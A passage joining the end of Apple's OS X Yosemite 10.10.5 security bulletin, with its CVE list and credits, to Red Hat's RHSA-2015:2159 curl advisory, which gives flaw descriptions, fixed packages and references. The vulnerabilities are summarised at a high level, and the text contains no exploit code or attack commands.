app queries\nDescription: An issue existed in the Dictionary app, which did not\nproperly secure user communications. This issue was addressed by\nmoving Dictionary queries to HTTPS. \nCVE-ID\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\nTeam\n\nDiskImages\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted DMG file may lead to an\nunexpected application termination or arbitrary code execution with\nsystem privileges\nDescription: A memory corruption issue existed in parsing of\nmalformed DMG images. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\n\ndyld\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A path validation issue existed in dyld. This was\naddressed through improved environment sanitization. \nCVE-ID\nCVE-2015-3760 : beist of grayhash, Stefan Esser\n\nFontParser\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3804 : Apple\nCVE-2015-5775 : Apple\n\nFontParser\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\n\ngroff\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Multiple issues in pdfroff\nDescription: Multiple issues existed in pdfroff, the most serious of\nwhich may allow arbitrary filesystem modification. These issues were\naddressed by removing pdfroff. \nCVE-ID\nCVE-2009-5044\nCVE-2009-5078\n\nImageIO\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted TIFF image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nTIFF images. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5758 : Apple\n\nImageIO\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Visiting a maliciously crafted website may result in the\ndisclosure of process memory\nDescription: An uninitialized memory access issue existed in\nImageIO\u0027s handling of PNG and TIFF images. Visiting a malicious\nwebsite may result in sending data from process memory to the\nwebsite. This issue is addressed through improved memory\ninitialization and additional validation of PNG and TIFF images. \nCVE-ID\nCVE-2015-5781 : Michal Zalewski\nCVE-2015-5782 : Michal Zalewski\n\nInstall Framework Legacy\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute arbitrary\ncode with root privileges\nDescription: An issue existed in how Install.framework\u0027s \u0027runner\u0027\nbinary dropped privileges. This issue was addressed through improved\nprivilege management. \nCVE-ID\nCVE-2015-5784 : Ian Beer of Google Project Zero\n\nInstall Framework Legacy\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A race condition existed in\nInstall.framework\u0027s \u0027runner\u0027 binary that resulted in\nprivileges being incorrectly dropped. This issue was addressed\nthrough improved object locking. \nCVE-ID\nCVE-2015-5754 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: Memory corruption issues existed in IOFireWireFamily. \nThese issues were addressed through additional type input validation. \nCVE-ID\nCVE-2015-3769 : Ilja van Sprundel\nCVE-2015-3771 : Ilja van Sprundel\nCVE-2015-3772 : Ilja van Sprundel\n\nIOGraphics\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in IOGraphics. This\nissue was addressed through additional type input validation. \nCVE-ID\nCVE-2015-3770 : Ilja van Sprundel\nCVE-2015-5783 : Ilja van Sprundel\n\nIOHIDFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A buffer overflow issue existed in IOHIDFamily. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5774 : TaiG Jailbreak Team\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in the mach_port_space_info interface,\nwhich could have led to the disclosure of kernel memory layout. This\nwas addressed by disabling the mach_port_space_info interface. \nCVE-ID\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\n@PanguTeam\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An integer overflow existed in the handling of IOKit\nfunctions. This issue was addressed through improved validation of\nIOKit API arguments. \nCVE-ID\nCVE-2015-3768 : Ilja van Sprundel\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to cause a system denial of service\nDescription: A resource exhaustion issue existed in the fasttrap\ndriver. This was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to cause a system denial of service\nDescription: A validation issue existed in the mounting of HFS\nvolumes. This was addressed by adding additional checks. \nCVE-ID\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute unsigned code\nDescription: An issue existed that allowed unsigned code to be\nappended to signed code in a specially crafted executable file. This\nissue was addressed through improved code signature validation. \nCVE-ID\nCVE-2015-3806 : TaiG Jailbreak Team\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A specially crafted executable file could allow unsigned,\nmalicious code to execute\nDescription: An issue existed in the way multi-architecture\nexecutable files were evaluated that could have allowed unsigned code\nto be executed. This issue was addressed through improved validation\nof executable files. \nCVE-ID\nCVE-2015-3803 : TaiG Jailbreak Team\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute unsigned code\nDescription: A validation issue existed in the handling of Mach-O\nfiles. This was addressed by adding additional checks. \nCVE-ID\nCVE-2015-3802 : TaiG Jailbreak Team\nCVE-2015-3805 : TaiG Jailbreak Team\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted plist may lead to an\nunexpected application termination or arbitrary code execution with\nsystem privileges\nDescription: A memory corruption existed in processing of malformed\nplists. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\n(@jollyjinx) of Jinx Germany\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A path validation issue existed. This was addressed\nthrough improved environment sanitization. \nCVE-ID\nCVE-2015-3761 : Apple\n\nLibc\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted regular expression may lead\nto an unexpected application termination or arbitrary code execution\nDescription: Memory corruption issues existed in the TRE library. \nThese were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3796 : Ian Beer of Google Project Zero\nCVE-2015-3797 : Ian Beer of Google Project Zero\nCVE-2015-3798 : Ian Beer of Google Project Zero\n\nLibinfo\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: Memory corruption issues existed in handling AF_INET6\nsockets. These were addressed by improved memory handling. \nCVE-ID\nCVE-2015-5776 : Apple\n\nlibpthread\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in handling syscalls. \nThis issue was addressed through improved lock state checking. \nCVE-ID\nCVE-2015-5757 : Lufeng Li of Qihoo 360\n\nlibxml2\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\nto 2.9.2, the most serious of which may allow a remote attacker to\ncause a denial of service\nDescription: Multiple vulnerabilities existed in libxml2 versions\nprior to 2.9.2. These were addressed by updating libxml2 to version\n2.9.2. \nCVE-ID\nCVE-2012-6685 : Felix Groebert of Google\nCVE-2014-0191 : Felix Groebert of Google\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: A memory access issue existed in libxml2. This was\naddressed by improved memory handling\nCVE-ID\nCVE-2014-3660 : Felix Groebert of Google\n\nlibxml2\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: A memory corruption issue existed in parsing of XML\nfiles. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3807 : Apple\n\nlibxpc\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in handling of\nmalformed XPC messages. This issue was improved through improved\nbounds checking. \nCVE-ID\nCVE-2015-3795 : Mathew Rowley\n\nmail_cmds\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary shell commands\nDescription: A validation issue existed in the mailx parsing of\nemail addresses. This was addressed by improved sanitization. \nCVE-ID\nCVE-2014-7844\n\nNotification Center OSX\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A malicious application may be able to access all\nnotifications previously displayed to users\nDescription: An issue existed in Notification Center, which did not\nproperly delete user notifications. This issue was addressed by\ncorrectly deleting notifications dismissed by users. \nCVE-ID\nCVE-2015-3764 : Jonathan Zdziarski\n\nntfs\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in NTFS. This issue\nwas addressed through improved memory handling. \nCVE-ID\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nOpenSSH\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Remote attackers may be able to circumvent a time delay for\nfailed login attempts and conduct brute-force attacks\nDescription: An issue existed when processing keyboard-interactive\ndevices. This issue was addressed through improved authentication\nrequest validation. \nCVE-ID\nCVE-2015-5600\n\nOpenSSL\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\nto 0.9.8zg, the most serious of which may allow a remote attacker to\ncause a denial of service. \nDescription: Multiple vulnerabilities existed in OpenSSL versions\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\n0.9.8zg. \nCVE-ID\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\n\nperl\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted regular expression may lead to\ndisclosure of unexpected application termination or arbitrary code\nexecution\nDescription: An integer underflow issue existed in the way Perl\nparsed regular expressions. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2013-7422\n\nPostgreSQL\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: An attacker may be able to cause unexpected application\ntermination or gain access to data without proper authentication\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\nissues were addressed by updating PostgreSQL to 9.2.13. \nCVE-ID\nCVE-2014-0067\nCVE-2014-8161\nCVE-2015-0241\nCVE-2015-0242\nCVE-2015-0243\nCVE-2015-0244\n\npython\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\nserious of which may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in Python versions\nprior to 2.7.6. These were addressed by updating Python to version\n2.7.10. \nCVE-ID\nCVE-2013-7040\nCVE-2013-7338\nCVE-2014-1912\nCVE-2014-7185\nCVE-2014-9365\n\nQL Office\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted Office document may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in parsing of Office\ndocuments. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5773 : Apple\n\nQL Office\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted XML file may lead to\ndisclosure of user information\nDescription: An external entity reference issue existed in XML file\nparsing. This issue was addressed through improved parsing. \nCVE-ID\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A. \n\nQuartz Composer Framework\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in parsing of\nQuickTime files. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5771 : Apple\n\nQuick Look\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Searching for a previously viewed website may launch the web\nbrowser and render that website\nDescription: An issue existed where QuickLook had the capability to\nexecute JavaScript. The issue was addressed by disallowing execution\nof JavaScript. \nCVE-ID\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\n\nQuickTime 7\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in QuickTime. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3772\nCVE-2015-3779\nCVE-2015-5753 : Apple\nCVE-2015-5779 : Apple\n\nQuickTime 7\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in QuickTime. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3765 : Joe Burnett of Audio Poison\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\nCVE-2015-5751 : WalkerFuz\n\nSceneKit\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Viewing a maliciously crafted Collada file may lead to\narbitrary code execution\nDescription: A heap buffer overflow existed in SceneKit\u0027s handling\nof Collada files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5772 : Apple\n\nSceneKit\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.4\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in SceneKit. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\n\nSecurity\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A standard user may be able to gain access to admin\nprivileges without proper authentication\nDescription: An issue existed in handling of user authentication. \nThis issue was addressed through improved authentication checks. \nCVE-ID\nCVE-2015-3775 : [Eldon Ahrold]\n\nSMBClient\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in the SMB client. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3773 : Ilja van Sprundel\n\nSpeech UI\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted unicode string with speech\nalerts enabled may lead to an unexpected application termination or\narbitrary code execution\nDescription: A memory corruption issue existed in handling of\nUnicode strings. This issue was addressed by improved memory\nhandling. \nCVE-ID\nCVE-2015-3794 : Adam Greenbaum of Refinitive\n\nsudo\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in sudo versions prior to\n1.7.10p9, the most serious of which may allow an attacker access to\narbitrary files\nDescription: Multiple vulnerabilities existed in sudo versions prior\nto 1.7.10p9. These were addressed by updating sudo to version\n1.7.10p9. \nCVE-ID\nCVE-2013-1775\nCVE-2013-1776\nCVE-2013-2776\nCVE-2013-2777\nCVE-2014-0106\nCVE-2014-9680\n\ntcpdump\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\nserious of which may allow a remote attacker to cause a denial of\nservice. \nDescription: Multiple vulnerabilities existed in tcpdump versions\nprior to 4.7.3. These were addressed by updating tcpdump to version\n4.7.3. \nCVE-ID\nCVE-2014-8767\nCVE-2014-8769\nCVE-2014-9140\n\nText Formats\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Parsing a maliciously crafted text file may lead to\ndisclosure of user information\nDescription: An XML external entity reference issue existed with\nTextEdit parsing. This issue was addressed through improved parsing. \nCVE-ID\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\n\nudf\nAvailable for: OS X Yosemite v10.10 to v10.10.4\nImpact: Processing a maliciously crafted DMG file may lead to an\nunexpected application termination or arbitrary code execution with\nsystem privileges\nDescription: A memory corruption issue existed in parsing of\nmalformed DMG images. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3767 : beist of grayhash\n\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\nhttps://support.apple.com/en-us/HT205033\n\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n\n-----BEGIN PGP SIGNATURE-----\n\niQIcBAEBCAAGBQJVzM3+AAoJEBcWfLTuOo7tx/YP/RTsUUx0UTk7rXj6AEcHmiR4\nY2xTUOXqRmxhieSbsGK9laKL5++lIzkGh5RC7oYag0+OgWtZz+EU/EtdoEJmGNJ6\n+PgoEnizYdKhO1kos1KCHOwG6UFCqoeEm6Icm33nVUqWp7uAmhVRMRxtMJEScLSR\n2LpsK0grIhFXtJGqu053TSKSCa1UTab8XWteZTT84uFGMSKbAFONj5CPIrR6+uev\nQpVTwrnskPDBOXJwGhjypvIBTbt2aa1wjCukOAWFHwf7Pma/QUdhKRkUK4vAb9/k\nfu2t2fBOvSMguJHRO+340NsQR9LvmdruBeAyNUH64srF1jtbAg0QnvZsPyO5aIyR\nA8WrzHl3oIc0II0y7VpI+3o0J3Nn03EcBPtIKeoeyznnjNziDm72HPI2d2+5ZSRz\nxjAd4Nmw+dgGq+UMkusIXgtRK4HcEpwzfImf3zqnKHakSncnFPhGKyNEgn8bK9a7\nAeAvSqMXXsJg8weHUF2NLnAn/42k2wIE8d5BOLaIy13xz6MJn7VUI21pK0zCaGBF\nsfkRFZP0eEVh8ZzU/nWp9E5KDpbsd72biJwvjWH4OrmkfzUWxStQiVwPTxtZD9LW\nc5ZWe+vqZJV9eYRH2hAOMPaYkOQ5Z4DySNVVOFAG0eq9til8+V0k3L7ipIVd2XUB\nmsu6gVP8uZhFYNb8byVJ\n=+0e/\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: curl security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2159-06\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2159.html\nIssue date: 2015-11-19\nCVE Names: CVE-2014-3613 CVE-2014-3707 CVE-2014-8150 \n CVE-2015-3143 CVE-2015-3148 \n=====================================================================\n\n1. Summary:\n\nUpdated curl packages that fix multiple security issues, several bugs, and\nadd two enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nIt was found that the libcurl library did not correctly handle partial\nliteral IP addresses when parsing received HTTP cookies. An attacker able\nto trick a user into connecting to a malicious server could use this flaw\nto set the user\u0027s cookie to a crafted domain, making other cookie-related\nissues easier to exploit. (CVE-2014-3613)\n\nA flaw was found in the way the libcurl library performed the duplication\nof connection handles. If an application set the CURLOPT_COPYPOSTFIELDS\noption for a handle, using the handle\u0027s duplicate could cause the\napplication to crash or disclose a portion of its memory. (CVE-2014-3707)\n\nIt was discovered that the libcurl library failed to properly handle URLs\nwith embedded end-of-line characters. An attacker able to make an\napplication using libcurl access a specially crafted URL via an HTTP proxy\ncould use this flaw to inject additional headers to the request or\nconstruct additional requests. (CVE-2014-8150)\n\nIt was discovered that libcurl implemented aspects of the NTLM and\nNegotatiate authentication incorrectly. If an application uses libcurl\nand the affected mechanisms in a specifc way, certain requests to a\npreviously NTLM-authenticated server could appears as sent by the wrong\nauthenticated user. Additionally, the initial set of credentials for HTTP\nNegotiate-authenticated requests could be reused in subsequent requests,\nalthough a different set of credentials was specified. (CVE-2015-3143,\nCVE-2015-3148)\n\nRed Hat would like to thank the cURL project for reporting these issues. \n\nBug fixes:\n\n* An out-of-protocol fallback to SSL 3.0 was available with libcurl. \nAttackers could abuse the fallback to force downgrade of the SSL version. \nThe fallback has been removed from libcurl. Users requiring this\nfunctionality can explicitly enable SSL 3.0 through the libcurl API. \n(BZ#1154060)\n\n* TLS 1.1 and TLS 1.2 are no longer disabled by default in libcurl. You can\nexplicitly disable them through the libcurl API. (BZ#1170339)\n\n* FTP operations such as downloading files took a significantly long time\nto complete. Now, the FTP implementation in libcurl correctly sets blocking\ndirection and estimated timeout for connections, resulting in faster FTP\ntransfers. (BZ#1218272)\n\nEnhancements:\n\n* With the updated packages, it is possible to explicitly enable or disable\nnew Advanced Encryption Standard (AES) cipher suites to be used for the TLS\nprotocol. (BZ#1066065)\n\n* The libcurl library did not implement a non-blocking SSL handshake, which\nnegatively affected performance of applications based on the libcurl multi\nAPI. The non-blocking SSL handshake has been implemented in libcurl, and\nthe libcurl multi API now immediately returns the control back to the\napplication whenever it cannot read or write data from or to the underlying\nnetwork socket. (BZ#1091429)\n\n* The libcurl library used an unnecessarily long blocking delay for actions\nwith no active file descriptors, even for short operations. Some actions,\nsuch as resolving a host name using /etc/hosts, took a long time to\ncomplete. The blocking code in libcurl has been modified so that the\ninitial delay is short and gradually increases until an event occurs. \n(BZ#1130239)\n\nAll curl users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1130239 - Difference in curl performance between RHEL6 and RHEL7\n1136154 - CVE-2014-3613 curl: incorrect handling of IP addresses in cookie domain\n1154060 - curl: Disable out-of-protocol fallback to SSL 3.0\n1154941 - CVE-2014-3707 curl: incorrect handle duplication after COPYPOSTFIELDS\n1161182 - Response headers added by proxy servers missing in CURLINFO_HEADER_SIZE\n1166264 - NTLM: ignore CURLOPT_FORBID_REUSE during NTLM HTTP auth [RHEL-7]\n1170339 - use the default min/max TLS version provided by NSS\n1178692 - CVE-2014-8150 curl: URL request injection vulnerability in parseurlandfillconn()\n1213306 - CVE-2015-3143 curl: re-using authenticated connection when unauthenticated\n1213351 - CVE-2015-3148 curl: Negotiate not treated as connection-oriented\n1218272 - Performance problem with libcurl and FTP on RHEL7.X\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\ncurl-7.29.0-25.el7.src.rpm\n\nx86_64:\ncurl-7.29.0-25.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-25.el7.i686.rpm\ncurl-debuginfo-7.29.0-25.el7.x86_64.rpm\nlibcurl-7.29.0-25.el7.i686.rpm\nlibcurl-7.29.0-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\ncurl-debuginfo-7.29.0-25.el7.i686.rpm\ncurl-debuginfo-7.29.0-25.el7.x86_64.rpm\nlibcurl-devel-7.29.0-25.el7.i686.rpm\nlibcurl-devel-7.29.0-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\ncurl-7.29.0-25.el7.src.rpm\n\nx86_64:\ncurl-7.29.0-25.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-25.el7.i686.rpm\ncurl-debuginfo-7.29.0-25.el7.x86_64.rpm\nlibcurl-7.29.0-25.el7.i686.rpm\nlibcurl-7.29.0-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\ncurl-debuginfo-7.29.0-25.el7.i686.rpm\ncurl-debuginfo-7.29.0-25.el7.x86_64.rpm\nlibcurl-devel-7.29.0-25.el7.i686.rpm\nlibcurl-devel-7.29.0-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\ncurl-7.29.0-25.el7.src.rpm\n\naarch64:\ncurl-7.29.0-25.el7.aarch64.rpm\ncurl-debuginfo-7.29.0-25.el7.aarch64.rpm\nlibcurl-7.29.0-25.el7.aarch64.rpm\nlibcurl-devel-7.29.0-25.el7.aarch64.rpm\n\nppc64:\ncurl-7.29.0-25.el7.ppc64.rpm\ncurl-debuginfo-7.29.0-25.el7.ppc.rpm\ncurl-debuginfo-7.29.0-25.el7.ppc64.rpm\nlibcurl-7.29.0-25.el7.ppc.rpm\nlibcurl-7.29.0-25.el7.ppc64.rpm\nlibcurl-devel-7.29.0-25.el7.ppc.rpm\nlibcurl-devel-7.29.0-25.el7.ppc64.rpm\n\nppc64le:\ncurl-7.29.0-25.el7.ppc64le.rpm\ncurl-debuginfo-7.29.0-25.el7.ppc64le.rpm\nlibcurl-7.29.0-25.el7.ppc64le.rpm\nlibcurl-devel-7.29.0-25.el7.ppc64le.rpm\n\ns390x:\ncurl-7.29.0-25.el7.s390x.rpm\ncurl-debuginfo-7.29.0-25.el7.s390.rpm\ncurl-debuginfo-7.29.0-25.el7.s390x.rpm\nlibcurl-7.29.0-25.el7.s390.rpm\nlibcurl-7.29.0-25.el7.s390x.rpm\nlibcurl-devel-7.29.0-25.el7.s390.rpm\nlibcurl-devel-7.29.0-25.el7.s390x.rpm\n\nx86_64:\ncurl-7.29.0-25.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-25.el7.i686.rpm\ncurl-debuginfo-7.29.0-25.el7.x86_64.rpm\nlibcurl-7.29.0-25.el7.i686.rpm\nlibcurl-7.29.0-25.el7.x86_64.rpm\nlibcurl-devel-7.29.0-25.el7.i686.rpm\nlibcurl-devel-7.29.0-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\ncurl-7.29.0-25.el7.src.rpm\n\nx86_64:\ncurl-7.29.0-25.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-25.el7.i686.rpm\ncurl-debuginfo-7.29.0-25.el7.x86_64.rpm\nlibcurl-7.29.0-25.el7.i686.rpm\nlibcurl-7.29.0-25.el7.x86_64.rpm\nlibcurl-devel-7.29.0-25.el7.i686.rpm\nlibcurl-devel-7.29.0-25.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3613\nhttps://access.redhat.com/security/cve/CVE-2014-3707\nhttps://access.redhat.com/security/cve/CVE-2014-8150\nhttps://access.redhat.com/security/cve/CVE-2015-3143\nhttps://access.redhat.com/security/cve/CVE-2015-3148\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 